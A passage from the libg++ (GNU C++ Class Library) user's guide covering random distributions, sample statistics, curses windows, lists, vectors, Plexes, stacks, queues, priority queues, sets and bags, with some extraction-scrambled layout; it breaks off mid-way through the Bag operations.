This is performed by each of the subclasses. Thus, given the above declaration of rnd, new random values may be obtained via, for example,

double next_exp_rand = rnd();

Currently, the following subclasses are provided.

23.5 Binomial

The binomial distribution models successfully drawing items from a pool. The first parameter to the constructor, n, is the number of items in the pool, and the second parameter, u, is the probability of each item being successfully drawn. The member asDouble returns the number of samples drawn from the pool. Although it is not checked, it is assumed that n > 0 and 0 <= u <= 1. The remaining members allow you to read and set the parameters.

23.6 Erlang

The Erlang class implements an Erlang distribution with mean mean and variance variance.

23.7 Geometric

The Geometric class implements a discrete geometric distribution. The first parameter to the constructor, mean, is the mean of the distribution. Although it is not checked, it is assumed that 0 <= mean <= 1. Geometric() returns the number of uniform random samples that were drawn before the sample was larger than mean. This quantity is always greater than zero.

23.8 HyperGeometric

The HyperGeometric class implements the hypergeometric distribution. The first parameter to the constructor, mean, is the mean and the second, variance, is the variance. The remaining members allow you to inspect and change the mean and variance.

23.9 NegativeExpntl

The NegativeExpntl class implements the negative exponential distribution. The first parameter to the constructor is the mean. The remaining members allow you to inspect and change the mean.

23.10 Normal

The Normal class implements the normal distribution. The first parameter to the constructor, mean, is the mean and the second, variance, is the variance. The remaining members allow you to inspect and change the mean and variance.
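The engine/distribution split of RNG and Random survives in the standard <random> header: an engine supplies uniform bits and a distribution shapes them. A NegativeExpntl-style draw can be sketched as follows; `next_neg_expntl` is an illustrative name, and std::minstd_rand (itself a multiplicative linear congruential generator) stands in for an MLCG-style engine:

```cpp
#include <random>

// Engine plays the RNG role, distribution plays the Random-subclass role.
// Exponential distribution with the given mean (rate = 1/mean).
double next_neg_expntl(std::minstd_rand& gen, double mean) {
    std::exponential_distribution<double> d(1.0 / mean);
    return d(gen);
}
```

As with Random subclasses, several distributions can share one engine, or each can own its own.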
23.11 LogNormal

The LogNormal class implements the logarithmic normal distribution. The first parameter to the constructor, mean, is the mean and the second, variance, is the variance. The remaining members allow you to inspect and change the mean and variance. The LogNormal class is a subclass of Normal.

23.12 Poisson

The Poisson class implements the poisson distribution. The first parameter to the constructor is the mean. The remaining members allow you to inspect and change the mean.

23.13 DiscreteUniform

The DiscreteUniform class implements a uniform random variable over the closed interval [low..high]. The first parameter to the constructor is low, and the second is high, although the order of these may be reversed. The remaining members allow you to inspect and change low and high.

23.14 Uniform

The Uniform class implements a uniform random variable over the half-open interval [low..high). The first parameter to the constructor is low, and the second is high, although the order of these may be reversed. The remaining members allow you to inspect and change low and high.

23.15 Weibull

The Weibull class implements a weibull distribution with parameters alpha and beta. The first parameter to the class constructor is alpha, and the second parameter is beta. The remaining members allow you to inspect and change alpha and beta.

23.16 RandomInteger

The RandomInteger class is not a subclass of Random, but a stand-alone integer-oriented class that is dependent on the RNG classes. RandomInteger returns random integers uniformly from the closed interval [low..high]. The first parameter to the constructor is low, and the second is high, although both are optional. The last argument is always a generator. Additional members allow you to inspect and change low and high. Random integers are generated using asInt() or asLong(). Operator syntax (()) is also available as a shorthand for asLong().
Because RandomInteger is often used in simulations for which uniform random integers are desired over a variety of ranges, asLong() and asInt() have high as an optional argument. Using this optional argument produces a single value from the new range, but does not change the default range.

24 Data Collection

Libg++ currently provides two classes for data collection and analysis of the collected data.

24.1 SampleStatistic

Class SampleStatistic provides a means of accumulating samples of double values and providing common sample statistics. Assume declaration of double x.

SampleStatistic a;    declares and initializes a.
a.reset();    re-initializes a.
a += x;    adds sample x.
int n = a.samples();    returns the number of samples.
x = a.mean()    returns the mean of the samples.
x = a.var()    returns the sample variance of the samples.
x = a.stdDev()    returns the sample standard deviation of the samples.
x = a.min()    returns the minimum encountered sample.
x = a.max()    returns the maximum encountered sample.
x = a.confidence(int p)    returns the p-percent (0 <= p < 100) confidence interval.
x = a.confidence(double p)    returns the p-probability (0 <= p < 1) confidence interval.

24.2 SampleHistogram

Class SampleHistogram is a derived class of SampleStatistic that supports collection and display of samples in bucketed intervals. It supports the following in addition to SampleStatistic operations.

SampleHistogram h(double lo, double hi, double width);    declares and initializes h to have buckets of size width from lo to hi. If the optional argument width is not specified, 10 buckets are created. The first bucket also holds samples less than lo, and the last one holds samples greater than hi.
int n = h.similarSamples(x)    returns the number of samples in the same bucket as x.
int n = h.inBucket(int i)    returns the number of samples in bucket i.
int b = h.buckets()    returns the number of buckets.
h.printBuckets(ostream s)    prints bucket counts on ostream s.
double bound = h.bucketThreshold(int i)    returns the upper bound of bucket i.
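The SampleStatistic accumulation interface can be sketched in standard C++ using Welford's online update for the running mean and variance. `Stat` is a minimal stand-in of mine, not the libg++ implementation:

```cpp
#include <cmath>

// Minimal SampleStatistic-style accumulator: operator+= adds a sample;
// mean(), var(), stdDev() report running statistics. Welford's update
// keeps the variance numerically stable.
class Stat {
    long n_ = 0;
    double mean_ = 0.0, m2_ = 0.0;
public:
    void operator+=(double x) {
        ++n_;
        double d = x - mean_;
        mean_ += d / n_;
        m2_ += d * (x - mean_);
    }
    long samples() const { return n_; }
    double mean() const { return mean_; }
    double var() const { return n_ > 1 ? m2_ / (n_ - 1) : 0.0; }  // sample variance
    double stdDev() const { return std::sqrt(var()); }
};
```

Accumulating the samples 1, 2, 3 gives a mean of 2 and a sample variance of 1.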
25 Curses-based classes

The CursesWindow class is a repackaging of standard curses library window features; most member functions have the same names as the corresponding curses library functions, except that the `w' prefix is generally dropped. Descriptions of these functions may be found in your local curses library documentation.

A CursesWindow may be declared via

CursesWindow w(WINDOW* win)    attaches w to the existing WINDOW* win. This constructor is normally used only in the following special case.
CursesWindow w(stdscr)    attaches w to the default curses library standard screen window.
CursesWindow w(int lines, int cols, int begin_y, int begin_x)    attaches to an allocated curses window with the indicated size and screen position.
CursesWindow sub(CursesWindow& w, int l, int c, int by, int bx, char ar = 'a')    attaches to a subwindow of w created via the curses `subwin' command. If ar is sent as `r', the origin (by, bx) is relative to the parent window, else it is absolute.

CursesWindow* w.parent()    returns a pointer to the parent of the subwindow, or 0 if there is none.
CursesWindow* w.child()    returns the first child subwindow of the window, or 0 if there is none.
CursesWindow* w.sibling()    returns the next sibling of the subwindow, or 0 if there is none.

For example, to call some function visit for all subwindows of a window, you could write

void traverse(CursesWindow& w)
{
  visit(w);
  if (w.child() != 0) traverse(*w.child());
  if (w.sibling() != 0) traverse(*w.sibling());
}

26 List classes

The files `g++-include/List.hP' and `g++-include/List.ccP' provide pseudo-generic Lisp-type lists (traversed via Pixes; see Chapter 9 [Pix], page 31). Supported operations are mirrored closely after those in Lisp. Generally, operations with functional forms are constructive, functional operations, while member forms (often with the same name) are sometimes procedural, possibly destructive operations. As with Lisp, destructive operations are supported.
Programmers are allowed to change head and tail fields in any fashion, creating circular structures and the like. However, again as with Lisp, some operations implicitly assume that they are operating on pure lists, and may enter infinite loops when presented with improper lists. Also, the reference-counting storage management facility may fail to reclaim unused circularly-linked nodes.

Several Lisp-like higher order functions are supported (e.g., map). Typedef declarations for the required functional forms are provided in the `.h' file.

For purposes of illustration, assume the specification of class intList. Common Lisp versions of supported operations are shown in brackets for comparison purposes.

26.1 Constructors and assignment

intList a; [ (setq a nil) ]    Declares a to be a nil intList.
intList b(2); [ (setq b (cons 2 nil)) ]    Declares b to be an intList with a head value of 2, and a nil tail.
intList c(3, b); [ (setq c (cons 3 b)) ]    Declares c to be an intList with a head value of 3, and b as its tail.
b = a; [ (setq b a) ]    Sets b to be the same list as a.

Assume the declarations of intLists a, b, and c in the following. See Chapter 9 [Pix], page 31.

26.2 List status

a.null(); OR !a; [ (null a) ]    returns true if a is null.
a.valid(); [ (listp a) ]    returns true if a is non-null. Inside a conditional test, the void* coercion may also be used, as in if (a) ....
intList(); [ nil ]    intList() may be used to null terminate a list, as in intList f(int x) { if (x == 0) return intList(); ... }.
a.length(); [ (length a) ]    returns the length of a.
a.list_length(); [ (list-length a) ]    returns the length of a, or -1 if a is circular.

26.3 heads and tails

a.get(); OR a.head() [ (car a) ]    returns a reference to the head field.
a[2]; [ (elt a 2) ]    returns a reference to the second (counting from zero) head field.
a.tail(); [ (cdr a) ]    returns the intList that is the tail of a.
a.last(); [ (last a) ]    returns the intList that is the last node of a.
a.nth(2); [ (nth a 2) ]    returns the intList that is the nth node of a.
a.set_tail(b); [ (rplacd a b) ]    sets a's tail to b.
a.push(2); [ (push 2 a) ]    equivalent to a = intList(2, a);
int x = a.pop() [ (setq x (car a)) (pop a) ]    returns the head of a, also setting a to its tail.

26.4 Constructive operations

b = copy(a); [ (setq b (copy-seq a)) ]    sets b to a copy of a.
b = reverse(a); [ (setq b (reverse a)) ]    Sets b to a reversed copy of a.
c = concat(a, b); [ (setq c (concat a b)) ]    Sets c to a concatenated copy of a and b.
c = append(a, b); [ (setq c (append a b)) ]    Sets c to a concatenated copy of a and b. All nodes of a are copied, with the last node pointing to b.
b = map(f, a); [ (setq b (mapcar f a)) ]    Sets b to a new list created by applying function f to each node of a.
c = combine(f, a, b);    Sets c to a new list created by applying function f to successive pairs of a and b. The resulting list has length the shorter of a and b.
b = remove(x, a); [ (setq b (remove x a)) ]    Sets b to a copy of a, omitting all occurrences of x.
b = remove(f, a); [ (setq b (remove-if f a)) ]    Sets b to a copy of a, omitting values causing function f to return true.
b = select(f, a); [ (setq b (remove-if-not f a)) ]    Sets b to a copy of a, omitting values causing function f to return false.
c = merge(a, b, f); [ (setq c (merge a b f)) ]    Sets c to a list containing the ordered elements (using the comparison function f) of the sorted lists a and b.

26.5 Destructive operations

a.append(b); [ (rplacd (last a) b) ]    appends b to the end of a. No new nodes are constructed.
a.prepend(b); [ (setq a (append b a)) ]    prepends b to the beginning of a.
a.del(x); [ (delete x a) ]    deletes all nodes with value x from a.
a.del(f); [ (delete-if f a) ]    deletes all nodes causing function f to return true.
a.select(f); [ (delete-if-not f a) ]    deletes all nodes causing function f to return false.
a.reverse(); [ (nreverse a) ]    reverses a in-place.
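Several of the destructive operations above have direct counterparts on std::list, which makes their semantics easy to check with a modern compiler. A sketch (`demo` is an illustrative name; these are standard-library calls, not the libg++ intList):

```cpp
#include <list>

// a.del(x) parallels std::list::remove(x) (delete all nodes with value x);
// a.sort(f) parallels std::list::sort(); a.reverse() parallels reverse().
std::list<int> demo() {
    std::list<int> a{3, 1, 2, 1};
    a.remove(1);    // like a.del(1): both 1s are deleted in place
    a.sort();       // like a.sort(f) with the default ordering
    return a;       // list is now 2 3
}
```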
a.sort(f); [ (sort a f) ]    sorts a in-place using ordering (comparison) function f.
a.apply(f); [ (mapc f a) ]    Applies void function f(int x) to each element of a.
a.subst(int old, int repl); [ (nsubst repl old a) ]    substitutes repl for each occurrence of old in a. Note the different argument order than the Lisp version.

26.6 Other operations

a.find(int x); [ (find x a) ]    returns the intList at the first occurrence of x.
a.find(b); [ (find b a) ]    returns the intList at the first occurrence of sublist b.
a.contains(int x); [ (member x a) ]    returns true if a contains x.
a.contains(b); [ (member b a) ]    returns true if a contains sublist b.
a.position(int x); [ (position x a) ]    returns the zero-based index of x in a, or -1 if x does not occur.
int x = a.reduce(f, int base); [ (reduce f a :initial-value base) ]    Accumulates the result of applying int function f(int, int) to successive elements of a, starting with base.

27 Linked Lists

SLLists provide pseudo-generic singly linked lists. DLLists provide doubly linked lists. The lists are designed for the simple maintenance of elements in a linked structure, and do not provide the more extensive operations (or node-sharing) of class List. They behave similarly to the slist and similar classes described by Stroustrup.

All list nodes are created dynamically. Assignment is performed via copying. Class DLList supports all SLList operations, plus additional operations described below. For purposes of illustration, assume the specification of class intSLList. In addition to the operations listed here, SLLists support traversal via Pixes. See Chapter 9 [Pix], page 31.

intSLList a;    Declares a to be an empty list.
intSLList b = a;    Sets b to an element-by-element copy of a.
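The SLList interface maps closely onto the standard std::forward_list: prepend is push_front, and ins_after/del_after correspond to insert_after/erase_after, with an iterator playing the role of the Pix. A sketch (`build` is an illustrative name):

```cpp
#include <forward_list>

// SLList-style construction with std::forward_list.
std::forward_list<int> build() {
    std::forward_list<int> a;
    a.push_front(2);          // like a.prepend(2)
    auto i = a.begin();       // iterator as the Pix
    a.insert_after(i, 5);     // like a.ins_after(i, 5); list is now 2 5
    return a;
}
```

pop_front then plays the role of del_front, deleting the first element without returning it.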
a.empty()    returns true if a contains no elements.
a.length();    returns the number of elements in a.
a.prepend(x);    places x at the front of the list.
a.append(x);    places x at the end of the list.
a.join(b)    places all nodes from b to the end of a, simultaneously destroying b.
x = a.front()    returns a reference to the item stored at the head of the list, or triggers an error if the list is empty.
a.rear()    returns a reference to the rear of the list, or triggers an error if the list is empty.
x = a.remove_front()    deletes and returns the item stored at the head of the list.
a.del_front()    deletes the first element, without returning it.
a.clear()    deletes all items from the list.
a.ins_after(Pix i, item);    inserts item after position i. If i is null, insertion is at the front.
a.del_after(Pix i);    deletes the element following i. If i is 0, the first item is deleted.

27.1 Doubly linked lists

Class DLList supports the following additional operations, as well as backward traversal via Pixes.

x = a.remove_rear();    deletes and returns the item stored at the rear of the list.
a.del_rear();    deletes the last element, without returning it.
a.ins_before(Pix i, x)    inserts x before i.
a.del(Pix& i, int dir = 1)    deletes the item at the current position, then advances forward if dir is positive, else backward.

28 Vector classes

The files `g++-include/Vec.ccP' and `g++-include/AVec.ccP' provide pseudo-generic standard array-based vector operations, with corresponding header files.

28.1 Constructors and assignment

intVec a;    declares a to be an empty vector. Its size may be changed via resize.
intVec a(10);    declares a to be an uninitialized vector of ten elements (numbered 0-9).
intVec b(6, 0);    declares b to be a vector of six elements, all initialized to zero. Any value can be used as the initial fill argument.
a = b;    Copies b to a. a is resized to be the same as b.
intVec a(10); intVec b(6, 0); a = b; a = b.at(2, 4) constructs a from the 4 elements of b starting at b[2]. Assume declarations of intVec a, b, c and int i, x in the following. 28.2 Status and access a.capacity(); returns the number of elements that can be held in a. sets a's length to 20. All elements are unchanged, except that if the new size is smaller than the original, than trailing elements are deleted, and if greater, trailing elements are uninitialized. returns a reference to the i'th element of a, or produces an error if i is out of range. returns a reference to the i'th element of a. Unlike the [] operator, i is not checked to ensure that it is within range. returns true if a and b contain the same elements in the same order. is the converse of a == b. a.resize(20); a[i]; a.elem(i) a == b; a != b; 90 User's Guide to the GNU C++ Class Library 28.3 Constructive operations c = concat(a, b); c = map(f, a); sets c to the new vector constructed from all of the elements of a followed by all of b. sets c to the new vector constructed by applying int function f(int) to each element of a. sets c to the new vector constructed by merging the elements of ordered vectors a and b using ordering (comparison) function f. sets c to the new vector constructed by applying int function f(int, int) to successive pairs of a and b. The result has length the shorter of a and b. sets c to a, with elements in reverse order. c = merge(a, b, f); c = combine(f, a, b); c = reverse(a) 28.4 Destructive operations a.reverse(); a.sort(f) reverses a in-place. sorts a in-place using comparison function f. The sorting method is a variation of the quicksort functions supplied with GNU emacs. lls the 2 elements starting at a[4] with zero. a.fill(0, 4, 2) 28.5 Other operations a.apply(f) applies function f to each element in a. accumulates the results of applying function f to successive elements of a starting with base. 
a.index(int targ);
     returns the index of the leftmost occurrence of the target, or -1 if it does not occur.
a.error(char* msg)
     invokes the error handler. The default version prints the error message, then aborts.

28.6 AVec operations

AVecs provide additional arithmetic operations. All vector-by-vector operators generate an error if the vectors are not the same length. The following operations are provided, for AVecs a, b and base element (scalar) s.

a = b;
     Copies b to a. a and b must be the same size.
a = s;
     fills all elements of a with the value s. a is not resized.
a + s; a - s; a * s; a / s
     adds, subtracts, multiplies, or divides each element of a with the scalar.
a += s; a -= s; a *= s; a /= s;
     adds, subtracts, multiplies, or divides the scalar into a.
a + b; a - b; product(a, b); quotient(a, b)
     adds, subtracts, multiplies, or divides corresponding elements of a and b.
a += b; a -= b; a.product(b); a.quotient(b);
     adds, subtracts, multiplies, or divides corresponding elements of b into a.
s = a * b;
     returns the inner (dot) product of a and b.
x = a.sum();
     returns the sum of elements of a.
x = a.sumsq();
     returns the sum of squared elements of a.
x = a.min();
     returns the minimum element of a.
x = a.max();
     returns the maximum element of a.
i = a.min_index();
     returns the index of the minimum element of a.
i = a.max_index();
     returns the index of the maximum element of a.

Note that it is possible to apply vector versions of other arithmetic operators via the mapping functions. For example, to set vector b to the cosines of doubleVec a, use b = map(cos, a);. This is often more efficient than performing the operations in an element-by-element fashion.

29 Plex classes

A "Plex" is a kind of array with the following properties:

 - Plexes may have arbitrary upper and lower index bounds. For example, a Plex may be declared to run from indices -10 .. 10.
 - Plexes may be dynamically expanded at both the lower and upper bounds of the array in steps of one element.
 - Only elements that have been specifically initialized or added may be accessed.
 - Elements may be accessed via indices. Indices are always checked for validity at run time.
 - Plexes may be traversed via simple variations of standard array indexing loops.
 - Plex elements may be accessed and traversed via Pixes.
 - Plex-to-Plex assignment and related operations on entire Plexes are supported.
 - Plex classes contain methods to help programmers check the validity of indexing and pointer operations.
 - Plexes form "natural" base classes for many restricted-access data structures relying on logically contiguous indices, such as array-based stacks and queues.

Plexes are implemented as pseudo-generic classes, and must be generated via the genclass utility. Plexes are implemented as a linked list of IChunks. Each chunk contains a part of the array. Chunk sizes may be specified within Plex constructors. Default versions also exist, that use a #define'd default. Plexes may be indexed and used like arrays, although the traversal syntax differs slightly:

for (int i = p.low(); i < p.fence(); p.next(i)) use(p[i]);
for (int i = p.high(); i > p.ecnef(); p.prev(i)) use(p[i]);
for (Pix t = p.first(); t != 0; p.next(t)) use(p(t));

Plex p;
     Declares p to be an initially zero-sized Plex with low index of zero, and the default chunk size. For FPlexes, chunk sizes represent maximum sizes.
Plex p(int size);
     Declares p to be an initially zero-sized Plex with low index of zero, and the indicated chunk size. If size is negative, then the Plex is created with free space at the beginning of the Plex, allowing more efficient add_low() operations. Otherwise, it leaves space at the end.
Plex p(int low, int size);
     Declares p to be an initially zero-sized Plex with low index of low, and the indicated chunk size.
Plex p(int low, int high, Base initval, int size = 0);
     Declares p to be a Plex with indices from low to high, initially filled with initval, and the indicated chunk size if specified, else the default or (high - low + 1), whichever is greater.
Plex q(p);
     Declares q to be a copy of p.
p = q;
     Copies Plex q into p, deleting its previous contents.
p.length()
     Returns the number of elements in the Plex.
p.empty()
     Returns true if Plex p contains no elements.
p.full()
     Returns true if Plex p cannot be expanded. This always returns false for XPlexes and MPlexes.
p[i]
     Returns a reference to the i'th element of p. An exception (error) occurs if i is not a valid index.
p.valid(i)
     Returns true if i is a valid index into Plex p.
p.low(); p.high();
     Return the minimum (maximum) valid index of the Plex, or the high (low) fence if the plex is empty.
p.ecnef(); p.fence();
     Return the index one position past the minimum (maximum) valid index.
p.next(i); p.prev(i)
     Set i to the next (previous) index. This index may not be within bounds.

Further Pix-based operations return a reference to the item at a given Pix; return the minimum (maximum) valid Pix of the Plex, or 0 if the plex is empty; set a Pix to the next (previous) Pix, or 0 if there is none; report whether the Plex contains the element associated with a Pix; convert a valid Pix to its corresponding index (raising an exception otherwise), and a valid index to the corresponding Pix; and return a reference to the element at the minimum (maximum) valid index (an exception occurs if the Plex is empty). In addition, one may test whether the Plex can be extended one element downward (upward), which is always true for XPlex and MPlex; extend the Plex by one element downward (upward) via add_low() and add_high(), which return the new minimum (maximum) index; shrink the Plex by one element on the low (high) end via del_low() and del_high(), which return the new minimum (maximum) element (an exception occurs if the Plex is empty); and append all of Plex q to the high side of p.
p.prepend(q)
     Prepend all of q to the low side of p.
p.clear()
     Delete all elements, resetting p to a zero-sized Plex.
p.reset_low(i)
     Resets p to be indexed starting at low() = i. For example, if p were initially declared via Plex p(0, 10, 0), and then re-indexed via p.reset_low(5), it could then be indexed from indices 5 .. 14.
p.fill(x)
     sets all p[i] to x.
p.fill(x, lo, hi)
     sets all of p[i] from lo to hi, inclusive, to x.
p.reverse()
     reverses p in-place.
p.chunk_size()
     returns the chunk size used for the plex.
p.error(const char* msg)
     calls the resettable error handler.

MPlexes are plexes with bitmaps that allow items to be logically deleted and restored. They behave like other plexes, but also support the following additional and modified capabilities:

p.del_index(i); p.del_Pix(pix)
     logically deletes p[i] (p(pix)). After deletion, attempts to access p[i] generate an error. Indexing via low(), high(), prev(), and next() skips the element. Deleting an element never changes the logical bounds of the plex.
p.undel_index(i); p.undel_Pix(pix)
     logically undeletes p[i] (p(pix)).
p.del_low(); p.del_high()
     Delete the lowest (highest) undeleted element, resetting the logical bounds of the plex to the next lowest (highest) undeleted index. Thus, MPlex del_low() and del_high() may shrink the bounds of the plex by more than one index.
p.adjust_bounds()
     Resets the low and high bounds of the Plex to the indexes of the lowest and highest actual undeleted elements.
int i = p.add(x)
     Adds x in an unused index, if possible, else performs add_high.
p.count()
     returns the number of valid (undeleted) elements.
p.available()
     returns the number of available (deleted) indices.
int i = p.unused_index()
     returns the index of some deleted element, if one exists, else triggers an error. An unused element may be reused via undel.
pix = p.unused_Pix()
     returns the pix of some deleted element, if one exists, else 0. An unused element may be reused via undel.

30 Stacks

Stacks are declared as an "abstract" class. They are currently implemented in any of three ways:

 - VStacks implement fixed-size stacks via arrays.
 - XPStacks implement dynamically-sized stacks via XPlexes.
 - SLStacks implement dynamically-sized stacks via linked lists.

All possess the same capabilities. They differ only in constructors. VStack constructors require a fixed maximum capacity argument. XPStack constructors optionally take a chunk size argument. SLStack constructors take no argument. Assume the declaration of a base element x.

Stack s; or Stack s(int capacity)
     declares a Stack.
s.empty()
     returns true if stack s is empty.
s.full()
     returns true if stack s is full. XPStacks and SLStacks never become full.
s.length()
     returns the current number of elements in the stack.
s.push(x)
     pushes x on stack s.
x = s.pop()
     pops and returns the top of stack.
s.top()
     returns a reference to the top of stack.
s.del_top()
     pops, but does not return the top of stack. When large items are held on the stack it is often a good idea to use top() to inspect and use the top of stack, followed by a del_top().
s.clear()
     removes all elements from the stack.

31 Queues

Queues are declared as an "abstract" class. They are currently implemented in any of three ways:

 - VQueues implement fixed-size queues via arrays.
 - XPQueues implement dynamically-sized queues via XPlexes.
 - SLQueues implement dynamically-sized queues via linked lists.

All possess the same capabilities; they differ only in constructors. VQueue constructors require a fixed maximum capacity argument. XPQueue constructors optionally take a chunk size argument. SLQueue constructors take no argument. Assume the declaration of a base element x.

Queue q; or Queue q(int capacity);
     declares a queue.
q.empty()
     returns true if queue q is empty.
q.full()
     returns true if queue q is full.
XPQueues and SLQueues are never full.

q.length()
     returns the current number of elements in the queue.
q.enq(x)
     enqueues x on queue q.
x = q.deq()
     dequeues and returns the front of queue.
q.front()
     returns a reference to the front of queue.
q.del_front()
     dequeues, but does not return the front of queue.
q.clear()
     removes all elements from the queue.

32 Double-ended Queues

Deques are declared as an "abstract" class. They are currently implemented in two ways:

 - XPDeques implement dynamically-sized deques via XPlexes.
 - DLDeques implement dynamically-sized deques via linked lists.

All possess the same capabilities. They differ only in constructors. XPDeque constructors optionally take a chunk size argument. DLDeque constructors take no argument. Double-ended queues support both stack-like and queue-like capabilities. Assume the declaration of a base element x.

Deque d; or Deque d(int initial_capacity)
     declares a deque.
d.empty()
     returns true if deque d is empty.
d.full()
     returns true if deque d is full. Always returns false in current implementations.
d.length()
     returns the current number of elements in the deque.
d.enq(x)
     inserts x at the rear of deque d.
d.push(x)
     inserts x at the front of deque d.
x = d.deq()
     dequeues and returns the front of deque.
d.front()
     returns a reference to the front of deque.
d.rear()
     returns a reference to the rear of the deque.
d.del_front()
     deletes, but does not return the front of deque.
d.del_rear()
     deletes, but does not return the rear of the deque.
d.clear()
     removes all elements from the deque.

33 Priority Queue class prototypes

Priority queues maintain collections of objects arranged for fast access to the least element. Several prototype implementations of priority queues are supported:

 - XPPQs implement 2-ary heaps via XPlexes.
 - SplayPQs implement PQs via Sleator and Tarjan's (JACM 1985) splay trees. The algorithms use a version of "simple top-down splaying" (described on page 669 of the article). The simple-splay mechanism for priority queue functions is loosely based on the one used by D. Jones in the C splay tree functions available from volume 14 of the uunet.uu.net archives.
 - PHPQs implement pairing heaps (as described by Fredman and Sedgewick in Algorithmica, Vol 1, pp. 111-129). Storage for heap elements is managed via an internal freelist technique. The constructor allows an initial capacity estimate for freelist space. The storage is automatically expanded if necessary to hold new items. The deletion technique is a fast "lazy deletion" strategy that marks items as deleted, without reclaiming space until the items come to the top of the heap.

All PQ classes support the following operations, for some PQ class Heap, instance h, Pix ind, and base class variable x.

h.empty()
     returns true if there are no elements in the PQ.
h.length()
     returns the number of elements in h.
ind = h.enq(x)
     Places x in the PQ, and returns its index.
x = h.deq()
     Dequeues the minimum element of the PQ into x, or generates an error if the PQ is empty.
h.front()
     returns a reference to the minimum element.
h.del_front()
     deletes the minimum element.
h.clear();
     deletes all elements from h.
h.contains(x)
     returns true if x is in h.
h(ind)
     returns a reference to the item indexed by ind.
ind = h.first()
     returns the Pix of the first item in the PQ or 0 if empty. This need not be the Pix of the least element.
h.next(ind)
     advances ind to the Pix of the next element, or 0 if there are no more.
ind = h.seek(x)
     Sets ind to the Pix of x, or 0 if x is not in h.
h.del(ind)
     deletes the item with Pix ind.
34 Set class prototypes

Set classes maintain unbounded collections of items containing no duplicates. (Listed next to each are average (followed by worst-case, if different) time complexities for [a] adding, [f] finding, and [d] deleting elements, and for [c] comparing (via ==, <=) and [m] merging (via |=, -=, &=) sets.)

 - XPSets implement unordered sets via XPlexes. ([a O(n)], [f O(n)], [d O(n)], [c O(n^2)], [m O(n^2)])
 - OXPSets implement ordered sets via XPlexes. ([a O(n)], [f O(log n)], [d O(n)], [c O(n)], [m O(n)])
 - SLSets implement unordered sets via linked lists. ([a O(n)], [f O(n)], [d O(n)], [c O(n^2)], [m O(n^2)])
 - OSLSets implement ordered sets via linked lists. ([a O(n)], [f O(n)], [d O(n)], [c O(n)], [m O(n)])
 - AVLSets implement ordered sets via threaded AVL trees. ([a O(log n)], [f O(log n)], [d O(log n)], [c O(n)], [m O(n)])
 - BSTSets implement ordered sets via binary search trees. The trees may be manually rebalanced via the O(n) balance() member function. ([a O(log n)/O(n)], [f O(log n)/O(n)], [d O(log n)/O(n)], [c O(n)], [m O(n)])
 - SplaySets implement ordered sets via Sleator and Tarjan's (JACM 1985) splay trees. The algorithms use a version of "simple top-down splaying" (described on page 669 of the article). (Amortized: [a O(log n)], [f O(log n)], [d O(log n)], [c O(n)], [m O(n log n)])
 - VHSets implement unordered sets via hash tables. The tables are automatically resized when their capacity is exhausted. ([a O(1)/O(n)], [f O(1)/O(n)], [d O(1)/O(n)], [c O(n)/O(n^2)], [m O(n)/O(n^2)])
 - VOHSets implement unordered sets via ordered hash tables. The tables are automatically resized when their capacity is exhausted. ([a O(1)/O(n)], [f O(1)/O(n)], [d O(1)/O(n)], [c O(n)/O(n^2)], [m O(n)/O(n^2)])
 - CHSets implement unordered sets via chained hash tables. ([a O(1)/O(n)], [f O(1)/O(n)], [d O(1)/O(n)], [c O(n)/O(n^2)], [m O(n)/O(n^2)])

The different implementations differ in whether their constructors require an argument specifying their initial capacity. Initial capacities are required for plex and hash table based Sets. If none is given, DEFAULT_INITIAL_CAPACITY (from `<T>defs.h') is used.
Sets support the following operations, for some class Set, instances a and b, Pix ind, and base element x. Since all implementations are virtual derived classes of the <T>Set class, it is possible to mix and match operations across different implementations, although, as usual, operations are generally faster when the particular classes are specified in functions operating on Sets. Pix-based operations are more fully described in the section on Pixes. See Chapter 9 [Pix], page 31.

Set a; or Set a(int initial_size);
     Declares a to be an empty Set. The second version is allowed in set classes that require initial capacity or sizing specifications.
a.empty()
     returns true if a is empty.
a.length()
     returns the number of elements in a.
Pix ind = a.add(x)
     inserts x into a, returning its index.
a.del(x)
     deletes x from a.
a.clear()
     deletes all elements from a.
a.contains(x)
     returns true if x is in a.
a(ind)
     returns a reference to the item indexed by ind.
ind = a.first()
     returns the Pix of the first item in the set or 0 if the Set is empty. For ordered Sets, this is the Pix of the least element.
a.next(ind)
     advances ind to the Pix of the next element, or 0 if there are no more.
ind = a.seek(x)
     Sets ind to the Pix of x, or 0 if x is not in a.
a == b
     returns true if a and b contain all the same elements.
a != b
     returns true if a and b do not contain all the same elements.
a <= b
     returns true if a is a subset of b.
a |= b
     Adds all elements of b to a.
a -= b
     Deletes all elements of b from a.
a &= b
     Deletes all elements of a not occurring in b.

35 Bag class prototypes

Bag classes maintain unbounded collections of items potentially containing duplicates. (Listed next to each are average (followed by worst-case, if different) time complexities for [a] adding, [f] finding, and [d] deleting elements.)

 - XPBags implement unordered bags via XPlexes. ([a O(1)], [f O(n)], [d O(n)])
 - OXPBags implement ordered bags via XPlexes. ([a O(n)], [f O(log n)], [d O(n)])
 - SLBags implement unordered bags via linked lists. ([a O(1)], [f O(n)], [d O(n)])
 - OSLBags implement ordered bags via linked lists. ([a O(n)], [f O(n)], [d O(n)])
 - SplayBags implement ordered bags via Sleator and Tarjan's (JACM 1985) splay trees. The algorithms use a version of "simple top-down splaying" (described on page 669 of the article). (Amortized: [a O(log n)], [f O(log n)], [d O(log n)])
 - VHBags implement unordered bags via hash tables. The tables are automatically resized when their capacity is exhausted. ([a O(1)/O(n)], [f O(1)/O(n)], [d O(1)/O(n)])
 - CHBags implement unordered bags via chained hash tables. ([a O(1)/O(n)], [f O(1)/O(n)], [d O(1)/O(n)])

The implementations differ in whether their constructors require an argument to specify their initial capacity. Initial capacities are required for plex and hash table based Bags. If none is given, DEFAULT_INITIAL_CAPACITY (from `<T>defs.h') is used.

Bags support the following operations, for some class Bag, instances a and b, Pix ind, and base element x. Since all implementations are virtual derived classes of the <T>Bag class, it is possible to mix and match operations across different implementations, although, as usual, operations are generally faster when the particular classes are specified in functions operating on Bags. Pix-based operations are more fully described in the section on Pixes. See Chapter 9 [Pix], page 31.

Bag a; or Bag a(int initial_size)
     Declares a to be an empty Bag. The second version is allowed in Bag classes that require initial capacity or sizing specifications.
a.empty()
     returns true if a is empty.
a.length()
     returns the number of elements in a.
ind = a.add(x)
     inserts x into a, returning its index.
a.del(x)
     deletes one occurrence of x from a.
a.remove(x)
     deletes all occurrences of x from a.
a.clear()
     deletes all elements from a.
a.contains(x)
     returns true if x is in a.
a.nof(x)
     returns the number of occurrences of x in a.
a(ind)
     returns a reference to the item indexed by ind.
ind = a.first()
